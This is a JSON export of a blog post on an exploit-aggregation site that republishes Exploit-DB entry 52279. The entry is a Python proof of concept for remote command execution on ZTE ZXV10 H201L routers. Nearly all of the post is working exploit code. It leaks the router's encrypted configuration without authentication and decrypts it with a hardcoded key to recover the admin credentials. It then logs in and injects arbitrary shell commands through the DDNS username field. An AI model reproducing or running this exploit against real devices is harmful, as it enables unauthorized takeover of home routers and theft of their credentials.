{"id":2554,"date":"2025-05-02T07:14:58","date_gmt":"2025-05-02T07:14:58","guid":{"rendered":"http:\/\/localhost\/?p=2554"},"modified":"2025-05-02T07:14:58","modified_gmt":"2025-05-02T07:14:58","slug":"zte-zxv10-h201l-rce-via-authentication-bypass","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=2554","title":{"rendered":"ZTE ZXV10 H201L &#8211; RCE via authentication bypass"},"content":{"rendered":"<h2>Exploit Details<\/h2>\n<h3>Basic Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit Title<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">ZTE ZXV10 H201L &#8211; RCE via authentication bypass<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Exploit ID<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">EDB-ID:52279<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Type<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">exploitdb<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Published<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-01T00:00:00<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Modified<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">2025-05-01T00:00:00<\/td>\n<\/tr>\n<\/table>\n<h3>CVSS Information<\/h3>\n<table style=\"width:100%; border-collapse: collapse; margin-bottom: 20px;\">\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">CVSS Score<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">0.0<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Severity<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd; color: #666666; font-weight: bold;\">NONE<\/td>\n<\/tr>\n<tr>\n<th style=\"text-align: left; padding: 8px; border: 1px solid #ddd; \">Vector<\/th>\n<td style=\"padding: 8px; border: 1px solid #ddd;\">NONE<\/td>\n<\/tr>\n<\/table>\n<h3>CVE Information<\/h3>\n<div style=\" padding: 15px; border: 1px solid #ddd; margin-bottom: 20px;\">\n<ul style=\"margin: 0; padding-left: 20px;\">\n<\/ul>\n<\/div>\n<h3>Exploit Description<\/h3>\n<div style=\" padding: 15px; border-left: 4px solid #4CAF50; margin-bottom: 20px;\">\nExploit Title: ZTE ZXV10 H201L &#8211; RCE via authentication bypass Exploit Author:  l34n (tasos meletlidis) https:\/\/i0.rs\/blog\/finding-0click-rce-on-two-zte-routers\/ import http.client, requests,&#8230;\n<\/div>\n<h3>Exploit Code<\/h3>\n<div style=\" color: #d4d4d4; padding: 15px; border: 1px solid #ddd; margin-bottom: 20px; font-family: 'Courier New', monospace; white-space: pre-wrap; overflow-x: auto;\">\n# Exploit Title: ZTE ZXV10 H201L &#8211; RCE via authentication bypass<br \/>\n<br \/># Exploit Author:  l34n (tasos meletlidis)<br \/>\n<br \/># https:\/\/i0.rs\/blog\/finding-0click-rce-on-two-zte-routers\/<\/p>\n<p>import http.client, requests, os, argparse, struct, zlib<br \/>\n<br \/>from io import BytesIO<br \/>\n<br \/>from os import stat<br \/>\n<br \/>from Crypto.Cipher import AES<\/p>\n<p>def login(session, host, port, username, password):<br \/>\n<br \/>    login_token = session.get(f&#8221;http:\/\/{host}:{port}\/&#8221;).text.split(&#8220;getObj(\\&#8221;Frm_Logintoken\\&#8221;).value = \\&#8221;&#8221;)[1].split(&#8220;\\&#8221;&#8221;)[0]<\/p>\n<p>    headers = {<br \/>\n<br \/>        &#8220;Content-Type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;<br \/>\n<br \/>    }<\/p>\n<p>    data = {<br \/>\n<br \/>        &#8220;Username&#8221;: username,<br \/>\n<br \/>        &#8220;Password&#8221;: password,<br \/>\n<br \/>        &#8220;frashnum&#8221;: &#8220;&#8221;,<br \/>\n<br \/>        &#8220;Frm_Logintoken&#8221;: login_token<br \/>\n<br \/>    }<\/p>\n<p>    session.post(f&#8221;http:\/\/{host}:{port}\/&#8221;, headers=headers, data=data)<\/p>\n<p>def logout(session, host, port):<br \/>\n<br \/>    headers = {<br \/>\n<br \/>        &#8220;Content-Type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;<br \/>\n<br \/>    }<\/p>\n<p>    data = {<br \/>\n<br \/>        &#8220;logout&#8221;: &#8220;1&#8221;,<br \/>\n<br \/>    }<\/p>\n<p>    session.post(f&#8221;http:\/\/{host}:{port}\/&#8221;, headers=headers, data=data)    <\/p>\n<p>def leak_config(host, port):<br \/>\n<br \/>    conn = http.client.HTTPConnection(host, port)<br \/>\n<br \/>    boundary = &#8220;&#8212;-WebKitFormBoundarysQuwz2s3PjXAakFJ&#8221;<br \/>\n<br \/>    body = (<br \/>\n<br \/>        f&#8221;&#8211;{boundary}\\r\\n&#8221;<br \/>\n<br \/>        &#8216;Content-Disposition: form-data; name=&#8221;config&#8221;\\r\\n&#8217;<br \/>\n<br \/>        &#8220;\\r\\n&#8221;<br \/>\n<br \/>        &#8220;\\r\\n&#8221;<br \/>\n<br \/>        f&#8221;&#8211;{boundary}&#8211;\\r\\n&#8221;<br \/>\n<br \/>    )<\/p>\n<p>    headers = {<br \/>\n<br \/>        &#8220;Content-Type&#8221;: f&#8221;multipart\/form-data; boundary={boundary}&#8221;,<br \/>\n<br \/>        &#8220;Content-Length&#8221;: str(len(body)),<br \/>\n<br \/>        &#8220;Connection&#8221;: &#8220;close&#8221;,<br \/>\n<br \/>    }<\/p>\n<p>    conn.request(&#8220;POST&#8221;, &#8220;\/getpage.gch?pid=101&#8221;, body, headers)<br \/>\n<br \/>    response = conn.getresponse()<br \/>\n<br \/>    response_data = response.read()<\/p>\n<p>    with open(&#8220;config.bin&#8221;, &#8220;wb&#8221;) as file:<br \/>\n<br \/>        file.write(response_data)<\/p>\n<p>    conn.close()<\/p>\n<p>def _read_exactly(fd, size, desc=&#8221;data&#8221;):<br \/>\n<br \/>    chunk = fd.read(size)<br \/>\n<br \/>    if len(chunk) != size:<br \/>\n<br \/>        return None<br \/>\n<br \/>    return chunk<\/p>\n<p>def _read_struct(fd, fmt, desc=&#8221;struct&#8221;):<br \/>\n<br \/>    size = struct.calcsize(fmt)<br \/>\n<br \/>    data = _read_exactly(fd, size, desc)<br \/>\n<br \/>    if data is None:<br \/>\n<br \/>        return None<br \/>\n<br \/>    return struct.unpack(fmt, data)<\/p>\n<p>def read_aes_data(fd_in, key):<br \/>\n<br \/>    encrypted_data = b&#8221;&#8221;<br \/>\n<br \/>    while True:<br \/>\n<br \/>        aes_hdr = _read_struct(fd_in, &#8220;>3I&#8221;, desc=&#8221;AES chunk header&#8221;)<br \/>\n<br \/>        if aes_hdr is None:<br \/>\n<br \/>            return None<br \/>\n<br \/>        _, chunk_len, marker = aes_hdr<\/p>\n<p>        chunk = _read_exactly(fd_in, chunk_len, desc=&#8221;AES chunk data&#8221;)<br \/>\n<br \/>        if chunk is None:<br \/>\n<br \/>            return None<\/p>\n<p>        encrypted_data += chunk<br \/>\n<br \/>        if marker == 0:<br \/>\n<br \/>            break<\/p>\n<p>    cipher = AES.new(key.ljust(16, b&#8221;\\0&#8243;)[:16], AES.MODE_ECB)<br \/>\n<br \/>    fd_out = BytesIO()<br \/>\n<br \/>    fd_out.write(cipher.decrypt(encrypted_data))<br \/>\n<br \/>    fd_out.seek(0)<br \/>\n<br \/>    return fd_out<\/p>\n<p>def read_compressed_data(fd_in, enc_header):<br \/>\n<br \/>    hdr_crc = zlib.crc32(struct.pack(&#8220;>6I&#8221;, *enc_header[:6]))<br \/>\n<br \/>    if enc_header[6] != hdr_crc:<br \/>\n<br \/>        return None<\/p>\n<p>    total_crc = 0<br \/>\n<br \/>    fd_out = BytesIO()<\/p>\n<p>    while True:<br \/>\n<br \/>        comp_hdr = _read_struct(fd_in, &#8220;>3I&#8221;, desc=&#8221;compression chunk header&#8221;)<br \/>\n<br \/>        if comp_hdr is None:<br \/>\n<br \/>            return None<br \/>\n<br \/>        uncompr_len, compr_len, marker = comp_hdr<\/p>\n<p>        chunk = _read_exactly(fd_in, compr_len, desc=&#8221;compression chunk data&#8221;)<br \/>\n<br \/>        if chunk is None:<br \/>\n<br \/>            return None<\/p>\n<p>        total_crc = zlib.crc32(chunk, total_crc)<br \/>\n<br \/>        uncompressed = zlib.decompress(chunk)<br \/>\n<br \/>        if len(uncompressed) != uncompr_len:<br \/>\n<br \/>            return None<\/p>\n<p>        fd_out.write(uncompressed)<br \/>\n<br \/>        if marker == 0:<br \/>\n<br \/>            break<\/p>\n<p>    if enc_header[5] != total_crc:<br \/>\n<br \/>        return None<\/p>\n<p>    fd_out.seek(0)<br \/>\n<br \/>    return fd_out<\/p>\n<p>def read_config(fd_in, fd_out, key):<br \/>\n<br \/>    ver_header_1 = _read_struct(fd_in, &#8220;>5I&#8221;, desc=&#8221;1st version header&#8221;)<br \/>\n<br \/>    if ver_header_1 is None:<br \/>\n<br \/>        return<\/p>\n<p>    ver_header_2_offset = 0x14 + ver_header_1[4]<\/p>\n<p>    fd_in.seek(ver_header_2_offset)<br \/>\n<br \/>    ver_header_2 = _read_struct(fd_in, &#8220;>11I&#8221;, desc=&#8221;2nd version header&#8221;)<br \/>\n<br \/>    if ver_header_2 is None:<br \/>\n<br \/>        return<br \/>\n<br \/>    ver_header_3_offset = ver_header_2[10]<\/p>\n<p>    fd_in.seek(ver_header_3_offset)<br \/>\n<br \/>    ver_header_3 = _read_struct(fd_in, &#8220;>2H5I&#8221;, desc=&#8221;3rd version header&#8221;)<br \/>\n<br \/>    if ver_header_3 is None:<br \/>\n<br \/>        return<br \/>\n<br \/>    signed_cfg_size = ver_header_3[3]<\/p>\n<p>    file_size = stat(fd_in.name).st_size<\/p>\n<p>    fd_in.seek(0x80)<br \/>\n<br \/>    sign_header = _read_struct(fd_in, &#8220;>3I&#8221;, desc=&#8221;signature header&#8221;)<br \/>\n<br \/>    if sign_header is None:<br \/>\n<br \/>        return<br \/>\n<br \/>    if sign_header[0] != 0x04030201:<br \/>\n<br \/>        return<\/p>\n<p>    sign_length = sign_header[2]<\/p>\n<p>    signature = _read_exactly(fd_in, sign_length, desc=&#8221;signature&#8221;)<br \/>\n<br \/>    if signature is None:<br \/>\n<br \/>        return<\/p>\n<p>    enc_header_raw = _read_exactly(fd_in, 0x3C, desc=&#8221;encryption header&#8221;)<br \/>\n<br \/>    if enc_header_raw is None:<br \/>\n<br \/>        return<br \/>\n<br \/>    encryption_header = struct.unpack(&#8220;>15I&#8221;, enc_header_raw)<br \/>\n<br \/>    if encryption_header[0] != 0x01020304:<br \/>\n<br \/>        return<\/p>\n<p>    enc_type = encryption_header[1]<\/p>\n<p>    if enc_type in (1, 2):<br \/>\n<br \/>        if not key:<br \/>\n<br \/>            return<br \/>\n<br \/>        fd_in = read_aes_data(fd_in, key)<br \/>\n<br \/>        if fd_in is None:<br \/>\n<br \/>            return<\/p>\n<p>    if enc_type == 2:<br \/>\n<br \/>        enc_header_raw = _read_exactly(fd_in, 0x3C, desc=&#8221;second encryption header&#8221;)<br \/>\n<br \/>        if enc_header_raw is None:<br \/>\n<br \/>            return<br \/>\n<br \/>        encryption_header = struct.unpack(&#8220;>15I&#8221;, enc_header_raw)<br \/>\n<br \/>        if encryption_header[0] != 0x01020304:<br \/>\n<br \/>            return<br \/>\n<br \/>        enc_type = 0<\/p>\n<p>    if enc_type == 0:<br \/>\n<br \/>        fd_in = read_compressed_data(fd_in, encryption_header)<br \/>\n<br \/>        if fd_in is None:<br \/>\n<br \/>            return<\/p>\n<p>    fd_out.write(fd_in.read())<\/p>\n<p>def decrypt_config(config_key):<br \/>\n<br \/>    encrypted = open(&#8220;config.bin&#8221;, &#8220;rb&#8221;)<br \/>\n<br \/>    decrypted = open(&#8220;decrypted.xml&#8221;, &#8220;wb&#8221;)<\/p>\n<p>    read_config(encrypted, decrypted, config_key)<\/p>\n<p>    with open(&#8220;decrypted.xml&#8221;, &#8220;r&#8221;) as file:<br \/>\n<br \/>        contents = file.read()<br \/>\n<br \/>        username = contents.split(&#8220;IGD.AU2&#8221;)[1].split(&#8220;User&#8221;)[1].split(&#8220;val=\\&#8221;&#8221;)[1].split(&#8220;\\&#8221;&#8221;)[0]<br \/>\n<br \/>        password = contents.split(&#8220;IGD.AU2&#8221;)[1].split(&#8220;Pass&#8221;)[1].split(&#8220;val=\\&#8221;&#8221;)[1].split(&#8220;\\&#8221;&#8221;)[0]<\/p>\n<p>    encrypted.close()<br \/>\n<br \/>    os.system(&#8220;rm config.bin&#8221;)<br \/>\n<br \/>    decrypted.close()<br \/>\n<br \/>    os.system(&#8220;rm decrypted.xml&#8221;)<\/p>\n<p>    return username, password<\/p>\n<p>def command_injection(cmd):<br \/>\n<br \/>    injection = f&#8221;user;{cmd};echo &#8221;<br \/>\n<br \/>    injection = injection.replace(&#8221; &#8220;, &#8220;${IFS}&#8221;)<br \/>\n<br \/>    return injection<\/p>\n<p>def set_ddns(session, host, port, payload):<br \/>\n<br \/>    headers = {<br \/>\n<br \/>        &#8220;Content-Type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;<br \/>\n<br \/>    }<\/p>\n<p>    data = {<br \/>\n<br \/>        &#8220;IF_ACTION&#8221;: &#8220;apply&#8221;,<br \/>\n<br \/>        &#8220;IF_ERRORSTR&#8221;: &#8220;SUCC&#8221;,<br \/>\n<br \/>        &#8220;IF_ERRORPARAM&#8221;: &#8220;SUCC&#8221;,<br \/>\n<br \/>        &#8220;IF_ERRORTYPE&#8221;: -1,<br \/>\n<br \/>        &#8220;IF_INDEX&#8221;: None,<br \/>\n<br \/>        &#8220;IFservice_INDEX&#8221;: 0,<br \/>\n<br \/>        &#8220;IF_NAME&#8221;: None,<br \/>\n<br \/>        &#8220;Name&#8221;: &#8220;dyndns&#8221;,<br \/>\n<br \/>        &#8220;Server&#8221;: &#8220;http:\/\/www.dyndns.com\/&#8221;,<br \/>\n<br \/>        &#8220;ServerPort&#8221;: None,<br \/>\n<br \/>        &#8220;Request&#8221;: None,<br \/>\n<br \/>        &#8220;UpdateInterval&#8221;: None,<br \/>\n<br \/>        &#8220;RetryInterval&#8221;: None,<br \/>\n<br \/>        &#8220;MaxRetries&#8221;: None,<br \/>\n<br \/>        &#8220;Name0&#8221;: &#8220;dyndns&#8221;,<br \/>\n<br \/>        &#8220;Server0&#8221;: &#8220;http:\/\/www.dyndns.com\/&#8221;,<br \/>\n<br \/>        &#8220;ServerPort0&#8221;: 80,<br \/>\n<br \/>        &#8220;Request0&#8221;: &#8220;&#8221;,<br \/>\n<br \/>        &#8220;UpdateInterval0&#8221;: 86400,<br \/>\n<br \/>        &#8220;RetryInterval0&#8221;: 60,<br \/>\n<br \/>        &#8220;MaxRetries0&#8221;: 3,<br \/>\n<br \/>        &#8220;Name1&#8221;: &#8220;No-IP&#8221;,<br \/>\n<br \/>        &#8220;Server1&#8221;: &#8220;http:\/\/www.noip.com\/&#8221;,<br \/>\n<br \/>        &#8220;ServerPort1&#8221;: 80,<br \/>\n<br \/>        &#8220;Request1&#8221;: &#8220;&#8221;,<br \/>\n<br \/>        &#8220;UpdateInterval1&#8221;: 86400,<br \/>\n<br \/>        &#8220;RetryInterval1&#8221;: 60,<br \/>\n<br \/>        &#8220;MaxRetries1&#8221;: 3,<br \/>\n<br \/>        &#8220;Name2&#8221;: &#8220;easyDNS&#8221;,<br \/>\n<br \/>        &#8220;Server2&#8221;: &#8220;https:\/\/web.easydns.com\/&#8221;,<br \/>\n<br \/>        &#8220;ServerPort2&#8221;: 80,<br \/>\n<br \/>        &#8220;Request2&#8221;: &#8220;&#8221;,<br \/>\n<br \/>        &#8220;UpdateInterval2&#8221;: 86400,<br \/>\n<br \/>        &#8220;RetryInterval2&#8221;: 180,<br \/>\n<br \/>        &#8220;MaxRetries2&#8221;: 5,<br \/>\n<br \/>        &#8220;Enable&#8221;: 1,<br \/>\n<br \/>        &#8220;Hidden&#8221;: None,<br \/>\n<br \/>        &#8220;Status&#8221;: None,<br \/>\n<br \/>        &#8220;LastError&#8221;: None,<br \/>\n<br \/>        &#8220;Interface&#8221;: &#8220;IGD.WD1.WCD3.WCIP1&#8221;,<br \/>\n<br \/>        &#8220;DomainName&#8221;: &#8220;hostname&#8221;,<br \/>\n<br \/>        &#8220;Service&#8221;: &#8220;dyndns&#8221;,<br \/>\n<br \/>        &#8220;Username&#8221;: payload,<br \/>\n<br \/>        &#8220;Password&#8221;: &#8220;password&#8221;,<br \/>\n<br \/>        &#8220;Offline&#8221;: None,<br \/>\n<br \/>        &#8220;HostNumber&#8221;: &#8220;&#8221;<br \/>\n<br \/>    }<\/p>\n<p>    session.post(f&#8221;http:\/\/{host}:{port}\/getpage.gch?pid=1002&#038;nextpage=app_ddns_conf_t.gch&#8221;, headers=headers, data=data)  <\/p>\n<p>def pwn(config_key, host, port):<br \/>\n<br \/>    session = requests.Session()<\/p>\n<p>    leak_config(host, port)<br \/>\n<br \/>    username, password = decrypt_config(config_key)<\/p>\n<p>    login(session, host, port, username, password)<\/p>\n<p>    shellcode = &#8220;echo hacked>\/var\/tmp\/pwned&#8221;<br \/>\n<br \/>    payload = command_injection(shellcode)<\/p>\n<p>    set_ddns(session, host, port, payload)<\/p>\n<p>    logout(session, host, port)<br \/>\n<br \/>    print(&#8220;[+] PoC complete&#8221;)<\/p>\n<p>def main():<br \/>\n<br \/>    parser = argparse.ArgumentParser(description=&#8221;Run remote command on ZTE ZXV10 H201L&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;&#8211;config_key&#8221;, type=lambda x: x.encode(), default=b&#8221;Renjx%2$CjM&#8221;, help=&#8221;Leaked config encryption key from cspd&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;&#8211;host&#8221;, required=True, help=&#8221;Target IP address of the router&#8221;)<br \/>\n<br \/>    parser.add_argument(&#8220;&#8211;port&#8221;, required=True, type=int, help=&#8221;Target port of the router&#8221;)<\/p>\n<p>    args = parser.parse_args()<\/p>\n<p>    pwn(args.config_key, args.host, args.port)<\/p>\n<p>if __name__ == &#8220;__main__&#8221;:<br \/>\n<br \/>    main()\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52279\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title ZTE ZXV10 H201L &#8211; RCE via authentication bypass Exploit ID EDB-ID:52279 Type exploitdb Published 2025-05-01T00:00:00 Modified 2025-05-01T00:00:00 CVSS Information&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,34,12,40,13,33,7,11,5],"class_list":["post-2554","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-00","tag-exploit","tag-exploitdb","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>ZTE ZXV10 H201L - RCE via authentication bypass - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=2554\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"ZTE ZXV10 H201L - RCE via authentication bypass - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title ZTE ZXV10 H201L &#8211; RCE via authentication bypass Exploit ID EDB-ID:52279 Type exploitdb Published 2025-05-01T00:00:00 Modified 2025-05-01T00:00:00 CVSS Information...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=2554\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-02T07:14:58+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=2554#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=2554\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"ZTE ZXV10 H201L &#8211; RCE via authentication bypass\",\"datePublished\":\"2025-05-02T07:14:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=2554\"},\"wordCount\":1107,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-0.0\",\"exploit\",\"exploitdb\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=2554#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=2554\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=2554\",\"name\":\"ZTE ZXV10 H201L - RCE via authentication bypass - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-02T07:14:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=2554#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=2554\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=2554#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"ZTE ZXV10 H201L &#8211; RCE via authentication bypass\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"ZTE ZXV10 H201L - RCE via authentication bypass - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=2554","og_locale":"en_US","og_type":"article","og_title":"ZTE ZXV10 H201L - RCE via authentication bypass - zero redgem","og_description":"Exploit Details Basic Information Exploit Title ZTE ZXV10 H201L &#8211; RCE via authentication bypass Exploit ID EDB-ID:52279 Type exploitdb Published 2025-05-01T00:00:00 Modified 2025-05-01T00:00:00 CVSS Information...","og_url":"https:\/\/zero.redgem.net\/?p=2554","og_site_name":"zero redgem","article_published_time":"2025-05-02T07:14:58+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=2554#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=2554"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"ZTE ZXV10 H201L &#8211; RCE via authentication bypass","datePublished":"2025-05-02T07:14:58+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=2554"},"wordCount":1107,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-0.0","exploit","exploitdb","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=2554#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=2554","url":"https:\/\/zero.redgem.net\/?p=2554","name":"ZTE ZXV10 H201L - RCE via authentication bypass - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-02T07:14:58+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=2554#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=2554"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=2554#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"ZTE ZXV10 H201L &#8211; RCE via authentication bypass"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/2554","targetHints"